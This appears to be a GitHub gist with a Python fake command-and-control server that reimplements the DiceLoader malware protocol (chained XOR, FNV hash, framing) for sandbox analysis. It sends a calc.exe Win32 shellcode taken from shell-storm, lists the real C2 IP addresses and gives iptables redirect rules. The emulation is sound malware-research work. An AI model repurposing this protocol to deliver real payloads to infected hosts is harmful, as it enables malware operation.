Created
January 26, 2024 08:06
-
-
Save lbpierre/a2ec27e172b9345fcfde6eddd7877f64 to your computer and use it in GitHub Desktop.
DiceLoader fake C2, usage: `python3 tcp_server.py -v --host 0.0.0.0 --port 8080`
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import os | |
import sys | |
import time | |
import struct | |
import logging | |
import socket | |
import select | |
import argparse | |
import platform | |
from itertools import zip_longest | |
from enum import Enum | |
from binascii import unhexlify | |
from typing import Dict, Any, Optional, Union, List, Tuple, Callable, Iterator | |
class Action(Enum):
    """Tag attached to each step of the DiceLoader sequence: receive or send."""

    RECV = 1
    SEND = 2
# Add these iptables rules to redirect the VM's traffic for the C2 IPs to a local IP.
# 62.76.234.234 and 194.87.82.181 are the C2 addresses obfuscated in the PE.
# Replace the interface (virbr0) and the port according to your setup:
# iptables -t nat -A PREROUTING -i virbr0 -p tcp -m tcp -d 62.76.234.234 --dport 443 -j DNAT --to-destination 127.0.0.1:8080 | |
# iptables -t nat -A PREROUTING -i virbr0 -p tcp -m tcp -d 194.87.82.181 --dport 443 -j DNAT --to-destination 127.0.0.1:8080 | |
# Enable route localnet: sysctl -w net.ipv4.conf.all.route_localnet=1 | |
# From shell-storm: | |
# https://shell-storm.org/shellcode/files/shellcode-567.html | |
# /* | |
# Author: SkuLL-HacKeR | |
# Big Thx To : my brothers : Pr0F.SELLiM - ThE X-HaCkEr - Jiko - My friends in Morocco | |
# H0ME : Geeksec.com & No-exploiT | |
# Email : My@Hotmail.iT & Wizard-skh@hotmail.com | |
# // Win32 Shellcode Collection (calc) 19 bytes | |
# // Shellcode Exec Calc.exe | |
# // Tested on XP SP2 FR | |
# #include "stdio.h" | |
# unsigned char shellcode[] = "\xeB\x02\xBA\xC7\x93" | |
# "\xBF\x77\xFF\xD2\xCC" | |
# "\xE8\xF3\xFF\xFF\xFF" | |
# "\x63\x61\x6C\x63"; | |
# int main () | |
# { | |
# int *ret; | |
# ret=(int *)&ret+2; | |
# printf("Shellcode Length is : %d\n",strlen(shellcode)); | |
# (*ret)=(int)shellcode; | |
# return 0; | |
# } | |
# Payload served to the client: one 0x01 byte followed by the 19 shellcode
# bytes quoted in the shell-storm comment above.
calc_exe = bytes.fromhex(
    "01"  # extra leading byte, not part of the quoted shellcode
    "eb02bac793"
    "bf77ffd2cc"
    "e8f3ffffff"
    "63616c63"
)
# Backup sequence: useful if you want to set
# a breakpoint on each recv / send function (from the WS2_32 DLL)
# self.sequence: Iterator[Tuple[Action, Callable]] = iter([ | |
# (Action.RECV, lambda _: [b""]), # 2 random byte | |
# (Action.RECV, lambda _: [b""]), # 10 generated random bytes | |
# (Action.RECV, lambda _: [b""]), # 22 bytes (fingerprint xor) | |
# (Action.RECV, lambda _: [b""]), # 19 bytes local ip addr | |
# # (Action.RECV, lambda _: [b""]), # received 4 bytes that are the fnv1 hash of the previous message | |
# # (Action.RECV, lambda _: [b""]), # 4 byte of fnv1 control | |
# # (Action.SEND, lambda _: [struct.pack('<h', 0xfd), struct.pack('<hhhh', 0x90, 0x90, 0x90, 0x90)]), # breaking loop | |
# # (Action.SEND, lambda _: [struct.pack('<h', 0xff), b"\x90" * 0xff]), # len of next data | |
# # (Action.SEND, lambda _: [b"\x90" * 0xff]), # data | |
# (Action.SEND, lambda _: [struct.pack('<B', 0x1), | |
# struct.pack('<B', 0xa), | |
# self.temp_xor_key, | |
# struct.pack('<L', 0x1000), | |
# self.xored_payload, | |
# struct.pack('<L', self.fnv1(self.xored_payload))]), | |
# (Action.RECV, lambda _: [b""]), | |
# (Action.RECV, lambda _: [b""]), | |
# (Action.RECV, lambda _: [struct.pack('>b', 0xf)]), | |
# (Action.RECV, lambda _: [b""]), | |
# (Action.RECV, lambda _: [b""]), | |
# (Action.RECV, lambda _: [b""]), | |
# ]) | |
class DiceLoader:
    """Scripted sequence of exchanges replayed by the fake DiceLoader C2.

    An instance is an iterator: each ``next()`` yields one
    ``(Action, callable)`` step. The callable takes the bytes of the last
    request and returns the list of byte strings to send for that step
    (``[b""]`` when nothing has to be sent).
    """

    def __init__(self):
        # Fixed key used for the first XOR pass over the payload.
        self.xor_key: bytes = unhexlify(
            "CD4E15AAAE079838B0FDC60FA99AD13EC4B2A9B0D8EF07E28BA87EFE3CA488"
        )
        # Second key (15 bytes once packed); it is also transmitted in the
        # SEND step below.
        self.temp_xor_key: bytes = struct.pack(
            ">QL3s", 0xDDDDDDDDAAAAAAAA, 0xBBBB, b"ccc"
        )
        # Shellcode padded with 0x90 bytes up to 4096 bytes.
        self.payload: bytes = calc_exe + b"\x90" * (4096 - len(calc_exe))
        # Payload XORed with the fixed key first, then with the temporary key.
        self.xored_payload: bytes = self.xor_blob(
            self.xor_blob(self.payload, self.xor_key), self.temp_xor_key
        )
        self.sequence: Iterator[Tuple[Action, Callable]] = iter(
            [
                (
                    Action.SEND,
                    # Bytes 0x01 and 0x0A, the temporary key, 0x1000 (4096,
                    # the payload size) as little-endian uint32, the
                    # doubly-XORed payload, then its fnv1 value.
                    lambda _: [
                        struct.pack("<B", 0x1),
                        struct.pack("<B", 0xA),
                        self.temp_xor_key,
                        struct.pack("<L", 0x1000),
                        self.xored_payload,
                        struct.pack("<L", self.fnv1(self.xored_payload)),
                    ],
                ),
                (Action.RECV, lambda _: [b""]),
                (Action.RECV, lambda _: [b""]),
                (Action.RECV, lambda _: [struct.pack(">b", 0xF)]),
            ]
        )

    def __iter__(self):
        """Return self so the object satisfies the full iterator protocol."""
        return self

    def __next__(self):
        """Return the next ``(Action, callable)`` step.

        Raises:
            StopIteration: When every scripted step has been consumed.
        """
        return next(self.sequence)

    def fnv1(self, data: bytes) -> int:
        """Compute the 32-bit FNV-style hash used by DiceLoader.

        Starting from 0, each byte is XORed into the accumulator, which is
        then multiplied by 0x1000193 and truncated to 32 bits.

        Args:
            data (bytes): The bytes to hash.
        Returns:
            int: The hash, in the range [0, 2**32). 0 for empty input.
        """
        output = 0
        for char in data:
            output = (0x1000193 * (char ^ output)) & 0xFFFFFFFF
        return output

    def xor_blob(self, blob: bytes, key: bytes) -> bytearray:
        """Apply DiceLoader's chained XOR obfuscation to ``blob``.

        Output byte ``i`` is ``blob[i - 1] ^ blob[i] ^ key[i % len(key)]``;
        the first byte has no predecessor and is just ``blob[0] ^ key[0]``.

        Args:
            blob (bytes): The data to obfuscate; may be empty.
            key (bytes): The repeating XOR key.
        Returns:
            bytearray: The transformed data, same length as ``blob``.
        Raises:
            ValueError: If ``key`` is empty while ``blob`` is not.
        """
        if not blob:
            return bytearray()
        if not key:
            raise ValueError("key must not be empty")
        key_length = len(key)
        output = bytearray(len(blob))
        previous = 0  # XOR identity: leaves the first byte as blob[0] ^ key[0]
        for index, value in enumerate(blob):
            output[index] = previous ^ value ^ key[index % key_length]
            previous = value
        return output
# Single module-level sequence: handle_outgoing_data() pulls one step from it
# per writable event, whichever client triggered the event.
diceloader_state_machine: DiceLoader = DiceLoader()
def grouper(iterable, n, fillvalue=None) -> zip_longest:
    """Split ``iterable`` into consecutive tuples of ``n`` items (hexdump helper).

    The last tuple is padded with ``fillvalue`` when the number of items is
    not a multiple of ``n``.
    """
    shared_iterator = iter(iterable)
    # The same iterator repeated n times: zip_longest draws n successive
    # items from it for every tuple it produces.
    columns = (shared_iterator,) * n
    return zip_longest(*columns, fillvalue=fillvalue)
class ColoredFormatter(logging.Formatter):
    """Formatter that prefixes each message with a colored marker and the level name."""

    # ANSI-colored marker for each known level name.
    COLORS = {
        "INFO": "\033[1;32m[+]\033[0m",  # Green
        "WARNING": "\033[1;33m[!]\033[0m",  # Orange/Yellow
        "ERROR": "\033[1;31m[-]\033[0m",  # Red
        "DEBUG": "\033[1;34m[*]\033[0m",  # Blue
    }

    def format(self, record: logging.LogRecord) -> str:
        """
        Render the record as ``<marker> <LEVEL> : <message>``.
        Args:
            record (logging.LogRecord): The log record.
        Returns:
            str: The formatted log message; the marker is empty for level
            names missing from COLORS.
        """
        rendered = super().format(record)
        level_name = record.levelname
        marker = self.COLORS.get(level_name, "")
        return "{} {} : {}".format(marker, level_name, rendered)
def setup_custom_logger(verbose: bool = False) -> None:
    """
    Attach a colored stdout handler to the root logger and set its level.
    Args:
        verbose (bool): Log at DEBUG level when True, at INFO otherwise.
    Returns:
        None
    """
    # The handler lets everything through; filtering is done by the root
    # logger's own level below.
    stdout_handler = logging.StreamHandler(sys.stdout)
    stdout_handler.setLevel(logging.DEBUG)
    stdout_handler.setFormatter(ColoredFormatter("%(message)s"))

    root_logger = logging.getLogger()
    root_logger.setLevel(logging.DEBUG if verbose else logging.INFO)
    root_logger.addHandler(stdout_handler)
def colorize_char(char: int) -> str:
    """
    Render one byte value for the text column of the hexdump.
    Args:
        char (int): The byte value.
    Returns:
        str: The character wrapped in red ANSI codes when it is printable
        ASCII (0x20 to 0x7E inclusive), otherwise an uncolored ".".
    """
    if char < 0x20 or char > 0x7E:
        return "."  # No color for non-printable characters
    return "\033[1;31m" + chr(char) + "\033[0m"  # Red for printable characters
def hexdump_bytes(data: bytes) -> None:
    """
    Emit ``data`` through logging.debug as a hexdump, 16 bytes per row.
    Each row shows its offset, the hex value of every byte and the
    colorized text rendering of every byte.
    Args:
        data (bytes): The input bytes.
    """
    column_header = " ".join(f"{column:02x}" for column in range(16))
    logging.debug(f"{'Offset':>8} | {column_header} | String ")
    logging.debug("-" * 92)
    for row_number, row in enumerate(grouper(data, 16)):
        # grouper pads the final row with None; padding is shown as a blank.
        hex_cells: List[str] = [
            " " if byte is None else f"{byte:02x}" for byte in row
        ]
        text_cells: List[str] = [
            " " if byte is None else colorize_char(byte) for byte in row
        ]
        row_start = row_number * 16
        logging.debug(
            f"{row_start:#8x} | {' '.join(hex_cells)} | {' '.join(text_cells)}"
        )
def create_epoll() -> "Optional[select.epoll]":
    """
    Create an epoll object when the platform provides one.
    The return annotation is a string on purpose: ``select.epoll`` does not
    exist on every platform, and evaluating it while the function is being
    defined would raise AttributeError at import time there.
    Returns:
        Optional[select.epoll]: A new epoll object, or None on Windows and
        on any other platform whose ``select`` module has no ``epoll``.
    """
    epoll_factory = getattr(select, "epoll", None)
    if platform.system() == "Windows" or epoll_factory is None:
        return None
    return epoll_factory()
def create_server_socket(host: str, port: int) -> socket.socket:
    """
    Create a non-blocking, listening TCP server socket.
    Args:
        host (str): The host IP address.
        port (int): The port number.
    Returns:
        socket.socket: The created server socket (SO_REUSEADDR set,
        backlog of 5, non-blocking).
    Raises:
        OSError: If the address cannot be bound or listened on.
        OverflowError: If ``port`` is outside 0-65535.
    """
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server_socket.bind((host, port))
        server_socket.listen(5)
        server_socket.setblocking(False)
    except Exception:
        # Do not leak the descriptor when configuration fails; the caller
        # still sees the original error.
        server_socket.close()
        raise
    return server_socket
def handle_new_connection(
    epoll: select.epoll,
    server_socket: socket.socket,
    connections: Dict[int, socket.socket],
    requests: Dict[int, bytes],
    responses: Dict[int, bytes],
) -> None:
    """
    Accept one pending client and start tracking it.
    The accepted socket is made non-blocking, registered with epoll for
    read events and given empty request/response buffers.
    Args:
        epoll (select.epoll): The epoll instance.
        server_socket (socket.socket): The server socket.
        connections (Dict[int, socket.socket]): Dictionary of client connections.
        requests (Dict[int, bytes]): Dictionary of incoming data from clients.
        responses (Dict[int, bytes]): Dictionary of outgoing data to clients.
    """
    client_socket, _peer_address = server_socket.accept()
    client_socket.setblocking(False)
    # Every table is keyed by the client's file descriptor.
    client_fd = client_socket.fileno()
    epoll.register(client_fd, select.EPOLLIN)
    connections[client_fd] = client_socket
    requests[client_fd] = responses[client_fd] = b""
def _drop_client(fileno, epoll, connections, requests, responses) -> None:
    """Unregister ``fileno`` from epoll, close its socket and delete its buffers."""
    epoll.unregister(fileno)
    connections[fileno].close()
    del connections[fileno]
    del requests[fileno]
    del responses[fileno]


def handle_incoming_data(
    fileno: int,
    epoll: select.epoll,
    connections: Dict[int, socket.socket],
    requests: Dict[int, bytes],
    responses: Dict[int, bytes],
) -> None:
    """
    Handle incoming data from a client.
    Reads up to 1024 bytes. On data, the bytes are appended to the client's
    request buffer, the descriptor is switched to write events and the data
    is logged. On end-of-stream or a connection reset, the client is torn
    down. If nothing is readable yet, the call is a no-op.
    Args:
        fileno (int): The file descriptor of the client socket.
        epoll (select.epoll): The epoll instance.
        connections (Dict[int, socket.socket]): Dictionary of client connections.
        requests (Dict[int, bytes]): Dictionary of incoming data from clients.
        responses (Dict[int, bytes]): Dictionary of outgoing data to clients.
    """
    try:
        data = connections[fileno].recv(1024)
    except BlockingIOError:
        # Non-blocking socket with nothing to read (spurious wake-up): keep
        # the client registered and wait for the next read event.
        return None
    except ConnectionResetError:
        logging.warning("Connection reset by peer")
        _drop_client(fileno, epoll, connections, requests, responses)
        return None
    if not data:
        # Empty read: the peer closed its side of the connection.
        _drop_client(fileno, epoll, connections, requests, responses)
        return None
    requests[fileno] += data
    # A request arrived: wait for the socket to become writable to answer.
    epoll.modify(fileno, select.EPOLLOUT)
    logging.info(f"received \033[34m{len(data)}\033[0m bytes")
    hexdump_bytes(data)
def _discard_connection(fileno, epoll, connections, requests) -> None:
    """Stop polling ``fileno``, close its socket and drop its bookkeeping."""
    epoll.unregister(fileno)
    connections.pop(fileno).close()
    requests.pop(fileno, None)


def handle_outgoing_data(
    fileno: int,
    epoll: select.epoll,
    connections: Dict[int, socket.socket],
    requests: Dict[int, bytes],
) -> None:
    """
    Handle outgoing data to a client.
    MODIFY ME to handle the server
    Pulls the next step from ``diceloader_state_machine``, calls it with the
    client's pending request bytes and sends every chunk it returns. An
    empty chunk means "nothing to answer": the request buffer is cleared and
    the descriptor goes back to read events. When the scripted sequence is
    exhausted, a warning is logged and the descriptor goes back to read
    events as well.
    Args:
        fileno (int): The file descriptor of the client socket.
        epoll (select.epoll): The epoll instance.
        connections (Dict[int, socket.socket]): Dictionary of client connections.
        requests (Dict[int, bytes]): Dictionary of incoming data from clients.
    tips: requests.get(fileno, b"") <- get the request
    """
    sock = connections[fileno]
    try:
        _, build_response = next(diceloader_state_machine)
    except StopIteration:
        # The sequence is shared and finite; running out of steps must not
        # take the whole server down.
        logging.warning("DiceLoader sequence exhausted, nothing left to send")
        requests[fileno] = b""
        epoll.modify(fileno, select.EPOLLIN)
        return
    try:
        for outgoing_data in build_response(requests.get(fileno, b"")):
            if outgoing_data == b"":
                # Useful when no data has to be sent back for this step.
                requests[fileno] = b""
                epoll.modify(fileno, select.EPOLLIN)
                return
            sent = sock.send(outgoing_data)
            if sent == 0:
                logging.warning(
                    f"Connection closed by remote peer: {sock.getpeername()}"
                )
                _discard_connection(fileno, epoll, connections, requests)
                # The socket is closed: do not try to send remaining chunks.
                return
            if sent < len(outgoing_data):
                logging.warning(
                    f"Partial send to {fileno}: {sent} of {len(outgoing_data)} byte(s)"
                )
            # The request has been answered; start the next one from empty.
            requests[fileno] = b""
            epoll.modify(fileno, select.EPOLLIN)
            logging.info(
                f"\033[1;32mSent\033[0m to {fileno}, \033[31m{len(outgoing_data)}\033[0m byte(s)"
            )
            hexdump_bytes(outgoing_data)
    except (ConnectionResetError, BrokenPipeError):
        logging.warning("Connection reset by remote peer")
        _discard_connection(fileno, epoll, connections, requests)
def main(host: str = "127.0.0.1", port: int = 8080):
    """
    Main function to run the epoll-based TCP server.
    The loop accepts clients, dispatches read/write/hang-up events to the
    handlers and re-executes the script when its file is modified on disk.
    Args:
        host (str): The address to listen on.
        port (int): The port to listen on.
    Raises:
        RuntimeError: If the platform provides no epoll implementation.
    """
    server_socket = create_server_socket(host, port)
    logging.info(f"Server starts {host}:{port}")
    epoll: Any = create_epoll()
    if epoll is None:
        # The event loop below is epoll-only; fail with a clear message
        # instead of an AttributeError on None.
        server_socket.close()
        raise RuntimeError("epoll is not available on this platform")
    epoll.register(server_socket.fileno(), select.EPOLLIN)
    connections: Dict[int, socket.socket] = {}
    requests: Dict[int, bytes] = {}
    responses: Dict[int, bytes] = {}
    last_modified = os.path.getmtime(__file__)
    try:
        while True:
            if os.path.getmtime(__file__) > last_modified:
                logging.info("Script modified. Reloading...")
                # Replaces the current process; does not return on success.
                os.execv(sys.executable, ["python"] + sys.argv)
            # Bounded wait so the modification check above also runs while
            # no client is talking to the server.
            events: Any = epoll.poll(1.0)
            for fileno, event in events:
                if fileno == server_socket.fileno():
                    handle_new_connection(
                        epoll, server_socket, connections, requests, responses
                    )
                elif event & select.EPOLLIN:
                    handle_incoming_data(
                        fileno, epoll, connections, requests, responses
                    )
                elif event & select.EPOLLOUT:
                    handle_outgoing_data(fileno, epoll, connections, requests)
                elif event & (select.EPOLLHUP | select.EPOLLERR):
                    epoll.unregister(fileno)
                    client_socket = connections.pop(fileno, None)
                    if client_socket is not None:
                        client_socket.close()
                    # A handler may already have removed some of these.
                    requests.pop(fileno, None)
                    responses.pop(fileno, None)
                    logging.info(f"Connection closed: {fileno}")
            time.sleep(0.1)  # Sleep for a short duration to avoid high CPU usage
    except KeyboardInterrupt:
        logging.info("Server interrupted by user.")
    finally:
        # Close the clients that are still connected, then the listener.
        for client_socket in connections.values():
            client_socket.close()
        epoll.unregister(server_socket.fileno())
        epoll.close()
        server_socket.close()
        logging.info("Server shutdown.")
if __name__ == "__main__":
    # Command-line entry point: parse the options, configure logging, then
    # run the server with the requested host and port.
    cli = argparse.ArgumentParser(description="Raw TCP server")
    cli.add_argument(
        "-v",
        "--verbose",
        help="Enable verbose logging (DEBUG level)",
        action="store_true",
    )
    cli.add_argument(
        "--host", default="127.0.0.1", type=str, help="Specify the host"
    )
    cli.add_argument("--port", default=8080, type=int, help="Specify the port")
    options = cli.parse_args()
    setup_custom_logger(options.verbose)
    main(options.host, options.port)
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment